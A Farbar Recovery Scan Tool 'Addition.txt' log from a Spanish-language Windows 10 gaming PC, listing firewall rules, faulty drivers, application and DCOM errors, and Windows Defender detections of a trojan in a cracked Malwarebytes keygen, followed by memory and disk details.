FirewallRules: [{B61F9338-294C-4CF7-9AD6-243BEE4EE351}] => (Allow) D:\Juegos\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [TCP Query User{45D6A164-E58C-48A2-A464-DED387B08DE7}D:\juegos\league of legends\rads\projects\league_client\releases\0.0.0.172\deploy\leagueclient.exe] => (Allow) D:\juegos\league of legends\rads\projects\league_client\releases\0.0.0.172\deploy\leagueclient.exe
FirewallRules: [UDP Query User{EC9D28C9-B34D-48B6-8515-10D9FB90B52E}D:\juegos\league of legends\rads\projects\league_client\releases\0.0.0.172\deploy\leagueclient.exe] => (Allow) D:\juegos\league of legends\rads\projects\league_client\releases\0.0.0.172\deploy\leagueclient.exe
FirewallRules: [TCP Query User{D4043931-292C-47D1-98AC-1063549292D5}D:\juegos\fornite\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe] => (Allow) D:\juegos\fornite\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe
FirewallRules: [UDP Query User{24A5229F-FAD8-4E4C-9831-530113382557}D:\juegos\fornite\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe] => (Allow) D:\juegos\fornite\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe
FirewallRules: [TCP Query User{899D2742-7CF3-4B47-A42F-F61C4B9310D9}D:\fortnite\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe] => (Allow) D:\fortnite\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe
FirewallRules: [UDP Query User{7C3C840F-01BB-4E88-B61D-10BAEFF01962}D:\fortnite\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe] => (Allow) D:\fortnite\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe
FirewallRules: [TCP Query User{30A020D3-8BF6-4EFA-A421-02E57FD6724F}D:\juegos\fortnite\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe] => (Allow) D:\juegos\fortnite\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe
FirewallRules: [UDP Query User{836A4D1E-D6FB-42E6-BBE4-B89D78EA5DC4}D:\juegos\fortnite\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe] => (Allow) D:\juegos\fortnite\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe
FirewallRules: [TCP Query User{34B6F701-F430-4CA1-A84C-B3E315ED2DC0}D:\juegos\fornite\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe] => (Allow) D:\juegos\fornite\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe
FirewallRules: [UDP Query User{2D9B720D-034D-48ED-96F0-6407EC743D31}D:\juegos\fornite\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe] => (Allow) D:\juegos\fornite\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe
FirewallRules: [TCP Query User{CDABA8E9-6D5C-4096-9002-5D17C19C1BC0}D:\juegos\league of legends\rads\projects\league_client\releases\0.0.0.174\deploy\leagueclient.exe] => (Allow) D:\juegos\league of legends\rads\projects\league_client\releases\0.0.0.174\deploy\leagueclient.exe
FirewallRules: [UDP Query User{3E0FD960-C0AB-48BF-AD4E-9063D0AC21BE}D:\juegos\league of legends\rads\projects\league_client\releases\0.0.0.174\deploy\leagueclient.exe] => (Allow) D:\juegos\league of legends\rads\projects\league_client\releases\0.0.0.174\deploy\leagueclient.exe
FirewallRules: [{FEDCAB75-ECB2-4995-97CE-872F5CD6D48E}] => (Allow) C:\Users\usuario\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{28CC0332-88E6-4CFB-A2E5-C803AC0071FC}] => (Allow) C:\Users\usuario\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{6A0DED51-2BC7-48B4-88A4-16EF0C53CB89}] => (Allow) D:\Juegos\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{243AF38D-5D05-4574-AEBB-8D922898CCC0}] => (Allow) D:\Juegos\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{086EE174-2471-4893-9C17-DFB877B7300E}] => (Allow) C:\Windows\SysWOW64\msiexec.exe
FirewallRules: [{8DB92254-7206-463F-BA31-2C57D8B2884B}] => (Allow) C:\Program Files (x86)\Common Files\hAwYUAXJE.exe
FirewallRules: [{620DC558-02E7-4FB4-BA31-8AE4076F35EA}] => (Allow) C:\Program Files (x86)\Common Files\KIIa.exe
FirewallRules: [{660DB5A5-8D36-4EBC-9C9A-02307DD3C07F}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{FE15A139-801F-44D8-B203-467A7293F2E6}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{15CF951D-2E5B-41E4-9766-AF4124D193EE}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{B00A7146-4CE2-481E-B420-25BA3F1ABD74}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{A4595A2D-CB56-48C2-BB27-C9C27727E7D9}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{22B794D6-0E4F-4109-A5E5-49A2C58B1B4E}] => (Allow) D:\Juegos\Steam\steamapps\common\Don't Starve Together\bin\dontstarve_steam.exe
FirewallRules: [{58E9EAC8-2CD9-4B28-A5A7-F5ECB327619A}] => (Allow) D:\Juegos\Steam\steamapps\common\Don't Starve Together\bin\dontstarve_steam.exe
FirewallRules: [{587D86FA-308A-415B-BE21-4D9155FF1612}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{3E2B0264-4169-4E5E-ABB1-957F5146A127}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{26B00B3C-4814-461B-8DBF-6A6073EEBB6D}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{AFDDA7BF-BF39-4020-8938-D1B0F7DB5574}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{D9FA232C-99C9-4C7E-837B-449381083AFC}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{A6857F3A-4F49-4A1C-8164-6A92501EEB23}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{87930742-A469-449D-B908-42A6C247F678}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{A1A6F06F-70FC-442A-930F-5B98553AE440}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{5D56E9F8-8BDB-4CE7-A433-8DCF857CF027}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{92C2F840-4940-46BA-8BC5-68E54D604D0C}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{2DD6E0AB-FC29-4F05-AB0D-37142A00979B}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{E713EA5F-A4D3-42AE-AFE8-4D184FFB595B}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{28668C0F-0D47-4A78-9580-498CB9FFC1E1}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{B1E3EC74-BAAF-484F-B8F6-3EAF6EB5B8EC}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{7BC2CD3F-6100-49EC-B7CD-DBB0F77B65F1}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{B02B216E-6AB9-431E-A59E-4E0674C1D990}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{69B5221E-A10A-4E99-A8CA-0B0A91FBF20F}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{0BEEC454-BFF3-410D-A0F4-79ABE991B5E1}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{AD64422D-56DF-4397-85F0-9CFAF2179E52}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{3F612739-C19C-4CE0-941A-261C19EA1CA8}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{349CCB18-CF4D-48C0-9F33-E8D742801BEC}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{C58544E0-6090-4007-99DD-CC39C4F51538}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{5967FB93-56CE-41CE-8516-3FFD846FD89E}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{E82FB505-9166-42D4-9D12-F9911AC650F5}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{697195C0-6027-4F4E-A81D-FFD7FF297BAA}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{0EB9EB16-73BF-418F-A039-2134EE621618}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{E8086A5C-5962-4DA1-84CC-F8D35410396B}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{AAD28ECE-20C4-48B9-8060-F950D2E1DD66}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{51751739-A6E0-4BFE-AC8D-1CD009A9BE1A}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{02FD6A0F-9BBF-40AA-8CA0-AC970AC689C4}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{BAFC25AE-E034-497F-850B-71CD065A3436}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{860E9194-B479-424F-AF6C-0E05EEA3AF2B}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{4B146FEA-CC7E-466D-BD78-9AED0BD0C2A1}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{F96A86D7-2518-4962-87F2-5653F72FA5DE}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{DA5875ED-5472-4993-8F8F-CE309465DCE5}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{D3E701A5-BB67-4357-B277-61826F0A5B3A}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{5722C095-053A-4509-99A4-206D959EFABA}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{5C065B2C-D690-44DD-BE13-32A8953B649E}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{EBEB5CD0-F706-4B2C-BD1F-40E8BBC0A69C}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{A2920824-FE10-45A5-A839-B2982871479C}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{0D59ED4F-8CD2-4C3D-8EF6-BCCE12CFE064}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{9A68AE6E-429C-4721-97B2-300A67324EA4}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{C4C940A8-4CFB-4E85-8380-B0110040529E}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{E2905067-D725-4300-867D-0ED9C2799199}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{2A5C01EC-839C-4175-AD54-B1611F86EFC9}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{CE815E3F-9942-4376-BEE6-89892AF5F5B3}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe

==================== Restore Points =========================

ATTENTION: System Restore is disabled

==================== Faulty Device Manager Devices =============

Name: AMD High Definition Audio Device
Description: AMD High Definition Audio Device
Class Guid: {4d36e96c-e325-11ce-bfc1-08002be10318}
Manufacturer: Advanced Micro Devices
Service: AtiHDAudioService
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver

Name: TP-LINK Wireless USB Adapter
Description: TP-LINK Wireless USB Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: TP-LINK
Service: RtlWlanu
Problem: : Windows cannot initialize the device driver for this hardware. (Code 37)
Resolution: The driver returned failure from its DriverEntry routine. Uninstall the driver, and then click "Scan for hardware changes" to reinstall or upgrade the driver.

Name: Realtek High Definition Audio
Description: Realtek High Definition Audio
Class Guid: {4d36e96c-e325-11ce-bfc1-08002be10318}
Manufacturer: Realtek
Service: IntcAzAudAddService
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver


==================== Event log errors: =========================

Application errors:
==================
Error: (11/24/2018 04:58:58 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: El programa chrome.exe, versión 70.0.3538.110, dejó de interactuar con Windows y se cerró. Para ver si hay más información disponible acerca del problema, comprueba el historial de problemas en la sección Seguridad y mantenimiento del Panel de control.

Identificador de proceso: 220c

Hora de inicio: 01d48440c8d976a3

Hora de finalización: 4294967295

Ruta de la aplicación: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

Identificador de informe: fa3bba61-0092-4775-bf37-cac6a84eafca

Nombre completo de paquete con errores: 

Identificador de aplicación relativa del paquete con errores:

Error: (11/24/2018 04:38:52 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nombre de la aplicación con errores: rundll32.exe, versión: 10.0.17134.1, marca de tiempo: 0x1e3f5e34
Nombre del módulo con errores: MSE.Engine.dll_unloaded, versión: 12.17.1863.0, marca de tiempo: 0x2a425e19
Código de excepción: 0xc000041d
Desplazamiento de errores: 0x00023c04
Identificador del proceso con errores: 0xcb8
Hora de inicio de la aplicación con errores: 0x01d4843e1576d4a0
Ruta de acceso de la aplicación con errores: C:\Windows\SysWOW64\rundll32.exe
Ruta de acceso del módulo con errores: MSE.Engine.dll
Identificador del informe: 8002cd61-6718-46e3-b7bf-d1567ae6a08d
Nombre completo del paquete con errores: 
Identificador de aplicación relativa del paquete con errores:

Error: (11/24/2018 04:38:48 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nombre de la aplicación con errores: rundll32.exe, versión: 10.0.17134.1, marca de tiempo: 0x1e3f5e34
Nombre del módulo con errores: KERNELBASE.dll, versión: 10.0.17134.407, marca de tiempo: 0xade8d4fe
Código de excepción: 0x0eedfade
Desplazamiento de errores: 0x00111812
Identificador del proceso con errores: 0xcb8
Hora de inicio de la aplicación con errores: 0x01d4843e1576d4a0
Ruta de acceso de la aplicación con errores: C:\Windows\SysWOW64\rundll32.exe
Ruta de acceso del módulo con errores: C:\Windows\System32\KERNELBASE.dll
Identificador del informe: af030c1f-f10e-4d58-8eaf-4586f529aed3
Nombre completo del paquete con errores: 
Identificador de aplicación relativa del paquete con errores:

Error: (11/24/2018 04:38:27 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: El programa chrome.exe, versión 70.0.3538.110, dejó de interactuar con Windows y se cerró. Para ver si hay más información disponible acerca del problema, comprueba el historial de problemas en la sección Seguridad y mantenimiento del Panel de control.

Identificador de proceso: 245c

Hora de inicio: 01d4843dde854c02

Hora de finalización: 4294967295

Ruta de la aplicación: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

Identificador de informe: abab9884-c572-46c2-9cf7-76dacdc58bab

Nombre completo de paquete con errores: 

Identificador de aplicación relativa del paquete con errores:

Error: (11/24/2018 04:33:45 PM) (Source: MsiInstaller) (EventID: 11704) (User: DESKTOP-CM2QFMQ)
Description: Product: Google Chrome -- Error 1704. An installation for vpohmnaghdlhgef is currently suspended.  You must undo the changes made by that installation to continue.  Do you want to undo those changes?

Error: (11/24/2018 04:32:26 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: El programa chrome.exe, versión 70.0.3538.110, dejó de interactuar con Windows y se cerró. Para ver si hay más información disponible acerca del problema, comprueba el historial de problemas en la sección Seguridad y mantenimiento del Panel de control.

Identificador de proceso: ce8

Hora de inicio: 01d4843cc4e26f17

Hora de finalización: 4294967295

Ruta de la aplicación: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

Identificador de informe: 898d6ac4-2462-4a8c-b3ee-6a7b8ae945c4

Nombre completo de paquete con errores: 

Identificador de aplicación relativa del paquete con errores:

Error: (11/24/2018 04:26:09 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: El programa chrome.exe, versión 70.0.3538.110, dejó de interactuar con Windows y se cerró. Para ver si hay más información disponible acerca del problema, comprueba el historial de problemas en la sección Seguridad y mantenimiento del Panel de control.

Identificador de proceso: 1480

Hora de inicio: 01d4843aec22e797

Hora de finalización: 4294967295

Ruta de la aplicación: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

Identificador de informe: 882bf842-b89a-484e-a17c-f066627f2793

Nombre completo de paquete con errores: 

Identificador de aplicación relativa del paquete con errores:

Error: (11/24/2018 04:15:50 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: El programa chrome.exe, versión 70.0.3538.110, dejó de interactuar con Windows y se cerró. Para ver si hay más información disponible acerca del problema, comprueba el historial de problemas en la sección Seguridad y mantenimiento del Panel de control.

Identificador de proceso: 1764

Hora de inicio: 01d4843ac804132d

Hora de finalización: 4294967295

Ruta de la aplicación: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

Identificador de informe: 90c38218-54f6-4e63-bb7d-df5467dd20bc

Nombre completo de paquete con errores: 

Identificador de aplicación relativa del paquete con errores:


System errors:
=============
Error: (11/24/2018 06:06:11 PM) (Source: DCOM) (EventID: 10005) (User: NT AUTHORITY)
Description: Error de DCOM "1084" al intentar iniciar el servicio EventSystem con argumentos "No disponible" para ejecutar el servidor:
{1BE1F766-5536-11D1-B726-00C04FB926AF}

Error: (11/24/2018 06:06:08 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-CM2QFMQ)
Description: Error de DCOM "1084" al intentar iniciar el servicio ShellHWDetection con argumentos "No disponible" para ejecutar el servidor:
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (11/24/2018 06:06:05 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-CM2QFMQ)
Description: Error de DCOM "1084" al intentar iniciar el servicio WSearch con argumentos "No disponible" para ejecutar el servidor:
{9E175B6D-F52A-11D8-B9A5-505054503030}

Error: (11/24/2018 06:06:02 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-CM2QFMQ)
Description: Error de DCOM "1084" al intentar iniciar el servicio WSearch con argumentos "No disponible" para ejecutar el servidor:
{9E175B6D-F52A-11D8-B9A5-505054503030}

Error: (11/24/2018 06:06:02 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-CM2QFMQ)
Description: Error de DCOM "1084" al intentar iniciar el servicio ShellHWDetection con argumentos "No disponible" para ejecutar el servidor:
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (11/24/2018 06:05:54 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-CM2QFMQ)
Description: Error de DCOM "1084" al intentar iniciar el servicio ShellHWDetection con argumentos "No disponible" para ejecutar el servidor:
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (11/24/2018 06:05:45 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-CM2QFMQ)
Description: Error de DCOM "1084" al intentar iniciar el servicio ShellHWDetection con argumentos "No disponible" para ejecutar el servidor:
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (11/24/2018 06:05:12 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-CM2QFMQ)
Description: Error de DCOM "1084" al intentar iniciar el servicio ShellHWDetection con argumentos "No disponible" para ejecutar el servidor:
{DD522ACC-F821-461A-A407-50B198B896DC}


Windows Defender:
===================================
Date: 2018-11-24 17:05:45.373
Description: 
Antivirus de Windows Defender detectó malware u otro software potencialmente no deseado.
Para obtener más información consulte lo siguiente:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Skeeyah.A!rfn&threatid=2147694182&enterprise=0
Nombre: Trojan:Win32/Skeeyah.A!rfn
Id.: 2147694182
Gravedad: Grave
Categoría: Caballo de Troya
Ruta de acceso: file:_C:\Users\usuario\Desktop\Malwarebytes.Premium.3.6.1.2711\Fix\MalwareBytes_Anti-Malware_Keygen_v1.7_URET.exe
Origen de detección: Equipo local
Tipo de detección: Concreto
Fuente de detección: Sistema
Usuario: NT AUTHORITY\SYSTEM
Nombre de proceso: Unknown
Versión de firma: AV: 1.281.748.0, AS: 1.281.748.0, NIS: 1.281.748.0
Versión de motor: AM: 1.1.15400.5, NIS: 1.1.15400.5

Date: 2018-11-24 17:05:29.550
Description: 
Antivirus de Windows Defender detectó malware u otro software potencialmente no deseado.
Para obtener más información consulte lo siguiente:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Skeeyah.A!rfn&threatid=2147694182&enterprise=0
Nombre: Trojan:Win32/Skeeyah.A!rfn
Id.: 2147694182
Gravedad: Grave
Categoría: Caballo de Troya
Ruta de acceso: file:_C:\Users\usuario\Desktop\Malwarebytes.Premium.3.6.1.2711\Fix\MalwareBytes_Anti-Malware_Keygen_v1.7_URET.exe
Origen de detección: Equipo local
Tipo de detección: Concreto
Fuente de detección: Protección en tiempo real
Usuario: NT AUTHORITY\SYSTEM
Nombre de proceso: C:\Windows\System32\SearchProtocolHost.exe
Versión de firma: AV: 1.281.748.0, AS: 1.281.748.0, NIS: 1.281.748.0
Versión de motor: AM: 1.1.15400.5, NIS: 1.1.15400.5

Date: 2018-11-24 16:53:59.719
Description: 
Antivirus de Windows Defender detectó malware u otro software potencialmente no deseado.
Para obtener más información consulte lo siguiente:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Skeeyah.A!rfn&threatid=2147694182&enterprise=0
Nombre: Trojan:Win32/Skeeyah.A!rfn
Id.: 2147694182
Gravedad: Grave
Categoría: Caballo de Troya
Ruta de acceso: file:_C:\Users\usuario\Desktop\Malwarebytes.Premium.3.6.1.2711\Fix\MalwareBytes_Anti-Malware_Keygen_v1.7_URET.exe; process:_pid:3456,ProcessStart:131875700161562308
Origen de detección: Equipo local
Tipo de detección: Concreto
Fuente de detección: Sistema
Usuario: NT AUTHORITY\SYSTEM
Nombre de proceso: C:\Users\usuario\Desktop\Malwarebytes.Premium.3.6.1.2711\Fix\MalwareBytes_Anti-Malware_Keygen_v1.7_URET.exe
Versión de firma: AV: 1.281.748.0, AS: 1.281.748.0, NIS: 1.281.748.0
Versión de motor: AM: 1.1.15400.5, NIS: 1.1.15400.5

Date: 2018-11-24 16:53:40.042
Description: 
Antivirus de Windows Defender detectó malware u otro software potencialmente no deseado.
Para obtener más información consulte lo siguiente:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Skeeyah.A!rfn&threatid=2147694182&enterprise=0
Nombre: Trojan:Win32/Skeeyah.A!rfn
Id.: 2147694182
Gravedad: Grave
Categoría: Caballo de Troya
Ruta de acceso: file:_C:\Users\usuario\Desktop\Malwarebytes.Premium.3.6.1.2711\Fix\MalwareBytes_Anti-Malware_Keygen_v1.7_URET.exe
Origen de detección: Equipo local
Tipo de detección: Concreto
Fuente de detección: Sistema
Usuario: NT AUTHORITY\SYSTEM
Nombre de proceso: Unknown
Versión de firma: AV: 1.281.748.0, AS: 1.281.748.0, NIS: 1.281.748.0
Versión de motor: AM: 1.1.15400.5, NIS: 1.1.15400.5

Date: 2018-11-24 16:52:33.686
Description: 
Antivirus de Windows Defender detectó malware u otro software potencialmente no deseado.
Para obtener más información consulte lo siguiente:
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Skeeyah.A!rfn&threatid=2147694182&enterprise=0
Nombre: Trojan:Win32/Skeeyah.A!rfn
Id.: 2147694182
Gravedad: Grave
Categoría: Caballo de Troya
Ruta de acceso: file:_C:\Users\usuario\Desktop\Malwarebytes.Premium.3.6.1.2711\Fix\MalwareBytes_Anti-Malware_Keygen_v1.7_URET.exe
Origen de detección: Equipo local
Tipo de detección: Concreto
Fuente de detección: Protección en tiempo real
Usuario: NT AUTHORITY\SYSTEM
Nombre de proceso: C:\Windows\System32\SearchProtocolHost.exe
Versión de firma: AV: 1.281.748.0, AS: 1.281.748.0, NIS: 1.281.748.0
Versión de motor: AM: 1.1.15400.5, NIS: 1.1.15400.5

Date: 2018-11-24 18:04:55.480
Description: 
La característica Protección en tiempo real de Antivirus de Windows Defender encontró un error:
Característica: Durante el acceso
Código de error: 0x8007043c
Descripción del error: El servicio no puede iniciarse en modo a prueba de errores 
Motivo: La protección antimalware dejó de funcionar por motivos desconocidos. En algunos casos, reiniciar el servicio puede que resuelva el problema.

Date: 2018-11-24 18:00:32.342
Description: 
La característica Protección en tiempo real de Antivirus de Windows Defender encontró un error:
Característica: Durante el acceso
Código de error: 0x8007043c
Descripción del error: El servicio no puede iniciarse en modo a prueba de errores 
Motivo: La protección antimalware dejó de funcionar por motivos desconocidos. En algunos casos, reiniciar el servicio puede que resuelva el problema.

Date: 2018-11-24 17:23:02.341
Description: 
La característica Protección en tiempo real de Antivirus de Windows Defender encontró un error:
Característica: Durante el acceso
Código de error: 0x8007043c
Descripción del error: El servicio no puede iniciarse en modo a prueba de errores 
Motivo: La protección antimalware dejó de funcionar por motivos desconocidos. En algunos casos, reiniciar el servicio puede que resuelva el problema.

Date: 2018-11-24 17:01:17.520
Description: 
La característica Protección en tiempo real de Antivirus de Windows Defender encontró un error:
Característica: Durante el acceso
Código de error: 0x8007043c
Descripción del error: El servicio no puede iniciarse en modo a prueba de errores 
Motivo: La protección antimalware dejó de funcionar por motivos desconocidos. En algunos casos, reiniciar el servicio puede que resuelva el problema.

Date: 2018-11-24 16:53:19.209
Description: 
La característica Protección en tiempo real de Antivirus de Windows Defender encontró un error:
Característica: Durante el acceso
Código de error: 0x8007043c
Descripción del error: El servicio no puede iniciarse en modo a prueba de errores 
Motivo: La protección antimalware dejó de funcionar por motivos desconocidos. En algunos casos, reiniciar el servicio puede que resuelva el problema.

==================== Memory info =========================== 

Processor: AMD Ryzen 5 2600 Six-Core Processor 
Percentage of memory in use: 8%
Total physical RAM: 16335.12 MB
Available physical RAM: 15002.41 MB
Total Virtual: 21455.12 MB
Available Virtual: 20399.72 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:111.25 GB) (Free:66.33 GB) NTFS
Drive d: (Disco Local) (Fixed) (Total:931.51 GB) (Free:716.93 GB) NTFS

\\?\Volume{aa1afbd0-0000-0000-0000-100000000000}\ (Reservado para el sistema) (Fixed) (Total:0.54 GB) (Free:0.14 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 931.5 GB) (Disk ID: 3E9A8BC4)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (MBR Code: Windows 7/8/10) (Size: 111.8 GB) (Disk ID: AA1AFBD0)
Partition 1: (Active) - (Size=549 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=111.3 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================